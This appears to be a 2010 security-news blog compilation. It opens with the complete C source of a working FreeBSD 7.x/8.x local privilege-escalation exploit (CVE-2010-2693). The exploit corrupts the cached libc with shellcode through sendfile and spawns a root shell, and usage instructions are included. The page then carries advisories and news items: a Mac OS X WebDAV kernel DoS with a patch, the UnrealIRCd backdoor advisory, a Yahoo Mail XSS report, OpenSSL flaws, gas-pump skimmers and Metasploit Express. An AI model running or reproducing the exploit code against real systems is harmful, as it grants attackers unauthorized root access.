Aug 20 2010

Really nice work from Jon.

/*
* cve-2010-2693.c
*
* FreeBSD Kernel 7.x/8.x mbuf M_RDONLY Privilege Escalation
* Jon Oberheide
* http://jon.oberheide.org
*
* Information:
*
* http://security.freebsd.org/advisories/FreeBSD-SA-10:07.mbuf.asc
*
* The read-only flag is not correctly copied when a mbuf buffer reference
* is duplicated. When the sendfile(2) system call is used to transmit
* data over the loopback interface, this can result in the backing pages
* for the transmitted file being modified, causing data corruption.
*
* Usage:
*
* $ gcc cve-2010-2693.c -o cve-2010-2693 -lpthread
* $ ./cve-2010-2693
* …
* # id
* uid=0(root) …
*
* Notes:
*
* Exploiting the mbuf vulnerability, we corrupt the in-memory copy of libc
* stored in the filesystem buffer cache with some shellcode. In particular,
* we overwrite getuid with a sled + mov $0x0,%eax + ret. Then, we spawn the
* setuid ‘su’ to get an instant root shell.
*
* The libc copy in the fs buffer cache will stick around for a while so you
* might want to remount/reboot after you’re done with your root shell.
*
* Kingcope beat me to this one by a long shot but I might as well still
* release it since it takes a slightly different approach. :-)
*
* Tested on FreeBSD 8.0-RELEASE, but should work on any unpatched 7.x/8.x.
*/

#include
#include
#include
#include
#include #include
#include
#include

#include

#include

/* 6-byte payload placed at the tail of the buffer that main() builds; the
   header comment above describes what it is meant to do once it overwrites
   getuid in the cached libc. SHELLCODE_LEN must match the literal's length. */
#define SHELLCODE “\xb8\x00\x00\x00\x00\xc3″
#define SHELLCODE_LEN 6

/*
 * Listener thread body (pthread entry point): opens a TCP socket, binds it to
 * 127.0.0.1:2693, accepts a single connection and then reads and discards
 * whatever arrives on it until read() reports an error.
 *
 * arg is unused. Any failure before accept() calls exit(1), which terminates
 * the whole process, not just this thread. Returns NULL once the read loop
 * ends; the sockets are not closed explicitly.
 */
void *
run_listener(void *arg)
{
    char buf[4096];
    int ret, sock, conn;
    struct sockaddr_in addr;

    /* socket()'s result is not checked; a failure would surface at bind(). */
    sock = socket(AF_INET, SOCK_STREAM, 0);
    bzero(&addr, sizeof(addr));
    addr.sin_family = AF_INET;
    addr.sin_port = htons(2693);
    /* Loopback only: the connection main() opens to this port therefore travels
       over the loopback interface, the path the advisory in the header names. */
    addr.sin_addr.s_addr = inet_addr(“127.0.0.1″);

    ret = bind(sock, (struct sockaddr *) &addr, sizeof(addr));
    if (ret < 0) {
        printf("[-] couldn't bind to listener socket\n");
        exit(1);
    }

    /* Backlog of one: exactly one peer (main()) is expected. */
    ret = listen(sock, 1);
    if (ret < 0) {
        printf("[-] couldn't listen on socket\n");
        exit(1);
    }

    /* Peer address is not recorded (NULL, NULL). */
    conn = accept(sock, NULL, NULL);
    if (conn < 0) {
        printf("[-] couldn't accept incoming connection\n");
        exit(1);
    }

    /* Drain the connection. Only a negative return (error) ends the loop; a
       return of 0 (peer closed) does not, so read() keeps being called then.
       &buf and buf denote the same address here. */
    while(1) {
        ret = read(conn, &buf, sizeof(buf));
        if (ret < 0) {
            break;
        }
    }

    return NULL;
}

/*
 * Program entry point. Sequence, as written below:
 *   1. build a 262-byte payload: 256 filler bytes (0x90) followed by SHELLCODE;
 *   2. confirm /usr/bin/su exists via stat() -- only existence is checked,
 *      the "setuid" in the message is not verified;
 *   3. locate the libc shared object in /lib and the value nm prints for the
 *      getuid symbol, both through popen()'d shell commands;
 *   4. start run_listener() on 127.0.0.1:2693 and connect to it;
 *   5. loop: write the payload to the socket, then sendfile() up to 2048 bytes
 *      of libc from a 256-byte-aligned offset below getuid, until the file
 *      size has been counted down;
 *   6. run system("su").
 * The header comment explains why step 5 is expected to alter the cached libc
 * pages on an unpatched kernel; that is the mbuf M_RDONLY defect addressed by
 * the FreeBSD-SA-10:07.mbuf advisory referenced above. Every failure path
 * calls exit(1). argc/argv are unused.
 */
int
main(int argc, char *argv[])
{
    FILE *fp;
    char libc[64];
    int ret, sock, fd, fsize, flags, chunk = 0;
    /* Note: a local int named getuid hides libc's getuid() inside main(). */
    int getuid, offset, writes;
    off_t bytes, sent = 0;
    struct sockaddr_in addr;
    struct stat statbuf;
    pthread_t listener;
    fd_set wset;

    /* Payload: 256 bytes of 0x90 with the 6-byte SHELLCODE at the very end. */
    char sc[256 + SHELLCODE_LEN];
    memset(sc, 0x90, sizeof(sc));
    memcpy(sc + (sizeof(sc) - SHELLCODE_LEN), SHELLCODE, SHELLCODE_LEN);

    printf("[+] checking for setuid /usr/bin/su binary...\n");

    /* Existence check only; statbuf.st_mode is never inspected. */
    ret = stat("/usr/bin/su", &statbuf);
    if (ret < 0) {
        printf("[-] couldn't find setuid /usr/bin/su binary!\n");
        exit(1);
    }

    printf("[+] checking for suitable libc library in /lib...\n");

    /* First name printed by "ls -1 /lib/libc.so.*". Neither popen()'s nor
       fscanf()'s result is checked, and "%s" has no width limit for the
       64-byte buffer. The popen() stream is closed with fclose() here. */
    memset(libc, 0x0, sizeof(libc));
    fp = popen("ls -1 /lib/libc.so.*", "r");
    fscanf(fp, "%s", libc);
    fclose(fp);

    printf("[+] found libc at %s\n", libc);

    /* Parse the leading hex column of nm's line for the getuid symbol; the
       value is used below as a file offset into libc. Same unchecked-call
       pattern as above. */
    fp = popen("nm -D /lib/libc.so.* | grep \"W getuid\"", "r");
    fscanf(fp, "%x", &getuid);
    fclose(fp);

    printf("[+] found getuid function at 0x%08x\n", getuid);

    /* Start 2048 bytes below the symbol and round down (integer division) to
       a 256-byte boundary; 256 * writes is the sendfile() offset in the loop. */
    offset = getuid - 2048;
    writes = offset / 256;

    printf("[+] target: 0x%08x, adjusted: 0x%08x, writes: %d\n", getuid, offset, writes);

    printf("[+] spawning listener thread...\n");

    if (pthread_create(&listener, NULL, run_listener, NULL) != 0){
        printf("[-] couldn't create listener thread!\n");
        exit(1);
    }
    /* Fixed delay rather than a handshake with the listener thread --
       presumably to let it reach accept() before the connect() below. */
    sleep(3);

    printf("[+] connecting to listener thread...\n");

    /* Mirrors the address run_listener() binds to. socket() is unchecked. */
    sock = socket(AF_INET, SOCK_STREAM, 0);
    bzero(&addr, sizeof(addr));
    addr.sin_family = AF_INET;
    addr.sin_port = htons(2693);
    addr.sin_addr.s_addr = inet_addr("127.0.0.1");

    ret = connect(sock, (struct sockaddr *) &addr, sizeof(addr));
    if (ret < 0) {
        printf("[-] couldn't connect to listening thread!\n");
        exit(1);
    }

    printf("[+] initiating exploit via sendfile...\n");

    fd = open(libc, O_RDONLY);
    if (fd < 0) {
        printf("[-] couldn't open target libc library!\n");
        exit(1);
    }

    ret = fstat(fd, &statbuf);
    if (ret < 0) {
        printf("[-] couldn't stat target libc library!\n");
        exit(1);
    }

    /* st_size (off_t) is narrowed into an int. */
    fsize = statbuf.st_size;
    /* The file descriptor (not the socket) is switched to non-blocking; the
       fcntl() results are not checked. */
    flags = fcntl(fd, F_GETFL);
    flags |= O_NONBLOCK;
    fcntl(fd, F_SETFL, flags);

    /* Send loop. Each pass waits for sock to become writable, then either
       continues an in-progress chunk (chunk > 0) with sendfile() or writes the
       payload and starts a new 2048-byte chunk. fsize is decremented only by
       sendfile()'d bytes, so the loop ends once that many bytes of the file
       have gone through the socket. 'sent' is accumulated but never read. */
    while (fsize > 0) {
        FD_ZERO(&wset);
        FD_SET(sock, &wset);
        /* nfds is derived from fd although the set contains sock. */
        ret = select(fd + 1, NULL, &wset, NULL, NULL);
        if (ret < 0) {
            continue;
        }

        if (chunk > 0) {
            bytes = 0;
            /* FreeBSD sendfile(2): file fd -> socket, starting at the same
               fixed offset (256 * writes) on every call, for the remaining
               chunk length; bytes receives the count actually transferred.
               On error the partial count in bytes is discarded. */
            ret = sendfile(fd, sock, 256 * writes, chunk, NULL, &bytes, 0);
            if (ret < 0) {
                continue;
            }
            chunk -= bytes;
            fsize -= bytes;
            sent += bytes;
            continue;
        }

        /* New chunk: payload first; the file bytes follow on later passes.
           write()'s return value is not checked. */
        chunk = 2048;
        write(sock, sc, sizeof(sc));
    }

    printf("[+] exploit complete!\n");
    printf("[+] spawning root shell...\n");

    /* Runs su through the shell; the header comment describes why this is
       expected to succeed once libc's cached pages have been altered. */
    system("su");

    return 0;
}

Source


Aug 10 2010

Vulnerability in OpenSSL 1.0.x

Security expert Georgi Guninski has pointed out a security issue in the 1.0 branch of OpenSSL that potentially allows SSL servers to compromise clients. Apparently the hole can be exploited simply by sending a specially crafted certificate to the client, causing deallocated memory to be accessed in the ssl3_get_key_exchange function (in ssl/s3_clnt.c). While this usually only causes an application to crash, it can potentially also be exploited to execute injected code.

Guninski included a certificate and a flawed key for recreating the problem in the report he released on the Full Disclosure mailing list. When tested briefly by The H’s associates at heise Security on a current Ubuntu 10.04 system with OpenSSL 0.9.8k, a certificate belonging to an RSA key of only 4006 bits in length (and where q is not prime) only produced a warning that the certificate was flawed.

As virtually none of the Linux distributions use OpenSSL 1.0.x, the hole is unlikely to create major concerns. An update has yet to be released by the OpenSSL developers, but the issue is already being discussed on the OpenSSL developer mailing list.

Source


Jul 26 2010

Mac OS X WebDAV kernel extension local denial-of-service

===================================================================
Mac OS X WebDAV kernel extension local denial-of-service
July 26, 2010
CVE-2010-1794
===================================================================

==Description==

“Web-based Distributed Authoring and Versioning, or WebDAV, is a set
of extensions to the Hypertext Transfer Protocol that allows computer
users to edit and manage files collaboratively on remote World Wide
Web servers.” [1]

Mac OS X supports WebDAV shares natively as a filesystem, implemented
as a kernel extension. Local users can mount WebDAV shares using the
“mount_webdav” utility included in most default installations.

The WebDAV kernel extension is vulnerable to a denial-of-service issue
that allows a local unprivileged user to trigger a kernel panic due to
a memory overallocation. This vulnerability has been verified with
proof-of-concept code. The vulnerable code is in the webdav_mount()
function, and reads as:

MALLOC(fmp->pm_socket_name, struct sockaddr *, args.pa_socket_namelen,
M_TEMP, M_WAITOK);

“args” is a user-controlled struct provided as an argument to a
request to mount a WebDAV share, and there is no checking of the
“pa_socket_namelen” field. If a user were to issue a mount request
with a very large value for this field, this will trigger a kernel
panic, since in BSD-based kernels (such as XNU), MALLOC() with
M_WAITOK will result in a panic when the requested memory cannot be
allocated.

==Notes on Disclosure==

My disclosure of this issue prior to an official fix is not meant to
be taken as a statement against Apple’s management of security issues.
Local denial-of-service issues are by nature low impact – many
security teams do not regard these as security-relevant at all. I
believe the chances of exploitation of this in real life are
practically non-existent. Given that the vulnerability resides in an
open source kernel extension, I chose to disclose this issue so that
concerned administrators can apply a fix immediately, while the rest
of us can benefit from a little increased awareness of potentially
unsafe memory allocation situations. Apple’s security team was
contacted prior to disclosure, and I’m sure they’ll incorporate a fix
in a future release.

==Solution==

The WebDAV kernel extension can be obtained online [2]. The following
patch can be applied to this extension, after which it should be
recompiled to replace the existing extension at
/System/Library/Extensions/webdav_fs.kext:

— webdav_fs.kextproj.orig/webdav_fs.kmodproj/webdav_vfsops.c
2010-07-21 09:51:09.000000000 -0400
+++ webdav_fs.kextproj/webdav_fs.kmodproj/webdav_vfsops.c
2010-07-21 10:32:43.000000000 -0400
@@ -319,6 +319,12 @@ static int webdav_mount(struct mount *mp
}

/* Get the server sockaddr from the args */
+ if(args.pa_socket_namelen > NAME_MAX)
+ {
+ error = EINVAL;
+ goto bad;
+ }
+
MALLOC(fmp->pm_socket_name, struct sockaddr *,
args.pa_socket_namelen, M_TEMP, M_WAITOK);
error = copyin(args.pa_socket_name, fmp->pm_socket_name,
args.pa_socket_namelen);
if (error)
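Review bot: The new bound compares `pa_socket_namelen` against NAME_MAX, a filename-length limit with no relation to the `struct sockaddr` the buffer is allocated for, and there is no lower bound, so a length of zero (or anything shorter than the sockaddr header) still reaches MALLOC and copyin and leaves `pm_socket_name` shorter than any later sockaddr access would presumably assume. A bound expressed in the type's own terms is clearer and closes both ends: `if (args.pa_socket_namelen < sizeof(struct sockaddr) || args.pa_socket_namelen > sizeof(struct sockaddr_storage)) { error = EINVAL; goto bad; }`. If `pa_socket_namelen` is a signed type, the `>` test alone also admits negative values that become very large when converted for MALLOC; the minimum check would cover that case too. webdav_mount's body begins and ends outside the hunk, so whether the `bad:` path is prepared for `pm_socket_name` still being unallocated cannot be checked here.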

==Credits==

This vulnerability was discovered by Dan Rosenberg (dan.j.rosenberg () gmail com).

==References==

CVE identifier CVE-2010-1794 has been assigned to this issue by Apple.

[1] http://en.wikipedia.org/wiki/WebDAV
[2] http://opensource.apple.com/source/webdavfs/webdavfs-293/webdav_fs.kextproj/webdav_fs.kmodproj/

Source


Jul 19 2010

Bluetooth at heart of gas station credit-card scam

Thieves are stealing credit-card numbers through skimmers they secretly installed inside pumps at gas stations in the U.S., using Bluetooth wireless to transmit stolen card numbers, says law enforcement investigating the incidents.

“We’ve sent detectives out to every gas station within a mile of (U.S.) Interstate (highway) 75,” says Lt. Steve Maynard, spokesman for the Alachua County Sheriff’s Office in Gainesville, Fla., which last Thursday was first notified about a suspicious skimming device discovered by a maintenance worker at a Shell Station. So far, three card-skimming devices hidden in gas pumps at three stations have been discovered by the Alachua County Sheriff’s Office, and the U.S. Secret Service has been notified as part of the gas-pump card-skimming investigation.

The Secret Service may be best known as the U.S. president’s bodyguard, but it is also responsible for investigating fraud and computer crime.

The Alachua County Sheriff’s Office, along with other local police departments, is trying to inspect as many gas stations in the area as possible, especially focusing on those along I-75. But law enforcement is encouraging gas station operators to look for signs of the skimmers at their pumps and contact them if they think they’ve found something. The Secret Service has indicated there’s a crime wave throughout the Southeast involving the gas-station pump card skimmers, and it may be traced back to a single gang that may be working out of Miami, Maynard says.

Nearby St. Johns County in Florida has also been hit by the gas-pump card skimmers. Maynard says criminals wanting to hide the credit-card skimmers in gas pumps have to have a key to the pump, but in some cases a single key will serve to get into many gas pumps. It’s not known if the gas-pump skimming operation involves insiders or not. Law enforcement is encouraging gas-station operators to train video surveillance they may use on the pumps.

The particular card-skimmers seen in Alachua County have put together devices with computer components and in this case, a Bluetooth wireless capability to easily send the card information to the thieves. It’s not yet known how many credit cards may have been stolen by means of the skimmers and fraudulently used. The investigation is “ongoing,” Maynard says. “We’re nowhere near closure. We wish we were.”

Source


Jun 14 2010

UnrealIRCd 3.2.8.1 backdoored on official ftp and site

Hello folks,

I’d like to let you know that there’s been a compromise of the
unrealircd website and ftp and the 3.2.8.1 tarball release had been
replaced by a backdoored copy.

I’m attaching Syzops original security advisory from

http://www.unrealircd.com/txt/unrealsecadvisory.20100612.txt

Yours,
satmd
UnrealIRCd support staff

Hi all,

This is very embarrassing…

We found out that the Unreal3.2.8.1.tar.gz file on our mirrors has been
replaced quite a while ago with a version with a backdoor (trojan) in
it. This backdoor allows a person to execute ANY command with the
privileges of the user running the ircd. The backdoor can be executed
regardless of any user
restrictions (so even if you have passworded server or hub that doesn’t
allow
any users in).

It appears the replacement of the .tar.gz occurred in November 2009 (at
least on some mirrors). It seems nobody noticed it until now.

Obviously, this is a very serious issue, and we’re taking precautions
so this will never happen again, and if it somehow does that it will be
noticed quickly.
We will also re-implement PGP/GPG signing of releases. Even though in
practice
(very) few people verify files, it will still be useful for those
people who do.

Safe versions
==============

The Windows (SSL and non-ssl) versions are NOT affected.

CVS is also not affected.

3.2.8 and any earlier versions are not affected.

Any Unreal3.2.8.1.tar.gz downloaded BEFORE November 10 2009 should be
safe, but you should really double-check, see next.

How to check if you’re running the backdoored version
======================================================
Two ways:

One is to check if the Unreal3.2.8.1.tar.gz you have is good or bad by
running ‘md5sum Unreal3.2.8.1.tar.gz’ on it.
Backdoored version (BAD) is: 752e46f2d873c1679fa99de3f52a274d
Official version (GOOD) is: 7b741e94e867c0a7370553fd01506c66

The other way is to run this command in your Unreal3.2 directory:
grep DEBUG3_DOLOG_SYSTEM include/struct.h
If it outputs two lines, then you’re running the backdoored/trojanized
version.
If it outputs nothing, then you’re safe and there’s nothing to do.

What to do if you’re running the backdoored version
====================================================
Obviously, you only need to do this if you checked you are indeed
running the
backdoored version, as mentioned above. Otherwise there’s no point in
continuing, as the version on our website is (now back) the good one
from April 13 2009 and nothing ‘new’.

Solution:
* Re-download from http://www.unrealircd.com/
* Verify MD5 (or SHA1) checksums, see next section (!)
* Recompile and restart UnrealIRCd

The backdoor is in the core, it is not possible to ‘clean’ UnrealIRCd
without
a restart or through a module.

How to verify that the release is the official version
=======================================================
You can check by running ‘md5sum Unreal3.2.8.1.tar.gz’, it should
output: 7b741e94e867c0a7370553fd01506c66 Unreal3.2.8.1.tar.gz

For reference, here are the md5sums for ALL proper files:
7b741e94e867c0a7370553fd01506c66 Unreal3.2.8.1.tar.gz
5a6941385cd04f19d9f4241e5c912d18 Unreal3.2.8.1.exe
a54eafa6861b6219f4f28451450cdbd3 Unreal3.2.8.1-SSL.exe

These are the EXACT same MD5sums as mentioned on April 13 2009 in the
initial 3.2.8.1 announcement to the unreal-notify and unreal-users
mailing list.

Finally
========
Again, I would like to apologize about this security breach.
We simply did not notice, but should have.
We did not check the files on all mirrors regularly, but should have.
We did not sign releases through PGP/GPG, but should have done so.

This advisory (and updates to it, if any) is posted to:

http://www.unrealircd.com/txt/unrealsecadvisory.20100612.txt

Source


Jun 14 2010

Yahoomail Dom Based XSS Vulnerability

Title: Yahoo mail Dom Based Cross Site Scripting

Author: Pratul Agrawal Date: 13/06/2010
Indian Hacker

Service: Webmail

Vendor: Yahoo mail, and possibly others

Vulnerability: Cross Site Scripting / Cookie-Theft / Relogin attacks

Severity: High

Tested on: Microsoft IE 7.0

Details:

Yahoo mail filter fails to detect script attributes in combination with
the style attribute as a tag, leaving everyone using yahoo mail service
with MSIE vulnerable to Cross Site Scripting including Cookie Theft and
relogin attacks. This is a high risk security vulnerability because the
attacker won't have to make the victim click on any link; all he/she has
to do is send the javascript code as an html email to the target, and
once the victim opens the email the malicious code will be executed in
his/her browser.

Impact:

This is a purely DOM-based XSS attack: the application takes the user-supplied data and feeds it directly into the API
designed to show the newly created folder name in Yahoo Mail. Through this an attacker can easily perform a cookie
theft attack, a site defacement attack and many more.

Steps of Exploit code:

1. Login the yahoomail with valid credentials.

2. Click on inbox.

3. Now click on Move to < create New Folder.

4. Now enter the javascript "> in the field given for creating new folder.

5. Press OK and the script get executed. yahhhhooooo

HuReee hUreYYYY

Source


Jun 9 2010

Google pays $2,000 for report of a vulnerability in Chrome

Google has paid out its highest sum yet, $2,000, for the discovery of a vulnerability found in its Chrome browser. The recipient is developer Sergey Glazunov, who found a DOM method-related means of circumventing the same origin policy. Details of the vulnerability are not yet publicly available, but it is likely that it could allow a web page to access content from other web pages. Google classifies the risk as high. Update 5.0.375.70 for Windows, Mac and Linux resolves the problem.

The update also fixes a further 10 vulnerabilities, eight of which are classified critical. Two of the vulnerabilities were discovered by Apple – both Chrome and Apple’s Safari being WebKit based. An update for Safari which fixed 48 vulnerabilities was released yesterday. One of the vulnerabilities in Chrome affects only the Linux version and enables escape from the sandbox.

As part of its Chromium Security Reward programme, launched earlier this year, Google has been rewarding those reporting security vulnerabilities with $500. In special cases, a committee can decide to increase the amount to a maximum of $1,337, but the maximum is only awarded for vulnerabilities which are particularly critical, or for particularly clever reports on vulnerabilities and their exploitation.

Google is hoping that this will improve the security of its browser and therefore the security of its users. It’s not clear why Google raised the sum to $2,000 in this case.

Source


Jun 3 2010

OpenSSL updates fix vulnerabilities

The OpenSSL developers have released versions 0.9.8o and 1.0.0a, fixing two security problems. A flaw in the ASN.1 parser can be exploited to write to invalid memory addresses using specially crafted “Cryptographic Message Syntax” (CMS) structures. The flaw potentially allows arbitrary code to be injected in order to compromise a system. CMS is not enabled by default in the 0.9.8 branch of OpenSSL, but it is enabled in the 1.0.0 branch.

An uninitialised buffer in the EVP_PKEY_verify_recover() function in version 1.0.0 can be exploited to make an invalid RSA key appear to be valid. Since very few applications have used this recently-introduced function, the scope of this problem is limited. The OpenSSL developers say that pkeyutl is currently one of the only OpenSSL tools to access this function.

Source


May 4 2010

XSS Vulnerabilities Happen To Everybody

You would think that of all people, the developers of the U.K.’s Cybersecurity Challenge website would be the most scrupulous about finding security vulnerabilities before they happen. But according to researchers, cross-site scripting (XSS) flaws happen to them, too.

According to a report on the Netcraft security site, an XSS vulnerability was uncovered on the Cyber Security Challenge UK website — before the site had even been made ready for candidates to register.

The Cybersecurity Challenge was established by a management consortium of key figures in cybersecurity, and is designed to test the mettle of security professionals.

The simple coding error was demonstrated by James Wheare, according to the report. Wheare told Netcraft that he was prompted to look for the hole after reading a friend’s tweet and noticed insufficient encoding in the page’s tags.

Netcraft says it has informed the Cybersecurity Challenge about the flaw.

Source


Apr 23 2010

Rapid7 launches Metasploit Express

When Rapid7 announced it was acquiring HD Moore’s hugely popular Metasploit tool late last year, many wondered if the integrity of the technology would be preserved.

Some things have changed. Moore, for example, could be seen at SOURCE Boston this week walking around in a suit and tie, which some saw as out of character. But on the technology side, the company appears intent on maintaining the tool’s integrity.

The vendor of unified vulnerability management, compliance and penetration testing tools said it would use Metasploit to enhance its NeXpose product. It also promised to “sponsor dedicated resources and contributions to the standalone, community-driven Metasploit Project to further its growth and success.”

This week, the company announced the latest step in that strategy with the unveiling of Metasploit Express, which it billed as an affordable, comprehensive and easier-to-use penetration testing tool for organizations with limited resources.
According to the company’s official announcement, features include:

Comprehensive penetration testing capabilities. Based on the world’s largest tested and integrated public database of exploits and payloads, Metasploit Express runs exploits and detects and tests insecure configurations, such as weak passwords, the company said. Unlike other existing penetration testing solutions, Metasploit Express lets penetration testers examine trust relationships between systems for a more accurate risk profile. In addition to testing standard PCs and servers, the product can compromise a range of network devices and offer data collection and automation capabilities for such devices.

Affordable ease of use. Available at a price point that a broad range of security professionals in large corporations, consulting organizations and small business can leverage, Metasploit Express’ network penetration testing capabilities are enhanced by the product’s graphical user interface and the Metasploit Express Workflow Manager, an advanced workflow engine that provides a step-by-step model to simplify and accelerate testing programs and eliminates the burden of many manual processes found with traditional exploit attack platforms.

Fully integrated and open. Rapid7 said Express integrates with all editions of the company’s vulnerability management product, Rapid7 NeXpose, including the Community Edition, free vulnerability software for commercial use. Users can launch a NeXpose scan directly from within the Metasploit Express user interface and the vulnerability information from NeXpose is directly linked to the exploit data in Metasploit Express. As a result, Rapid7 said, users can detect vulnerabilities in their IT infrastructure and then use Metasploit Express to test for the ability to penetrate the vulnerabilities and launch an attack, decreasing the time to test and increasing the efficiency in real threat detection.

Continued support from and for the open source community. Rapid7 and the Metasploit Project are preparing for the release of version 3.4 of the Metasploit Framework, which will include improvements to the Meterpreter payload, the expansion of the framework’s brute-force capabilities and the complete overhaul of the back-end database schema and event subsystem. In addition, more than 60 exploit modules and 40 auxiliary modules will be added with version 3.4.

Source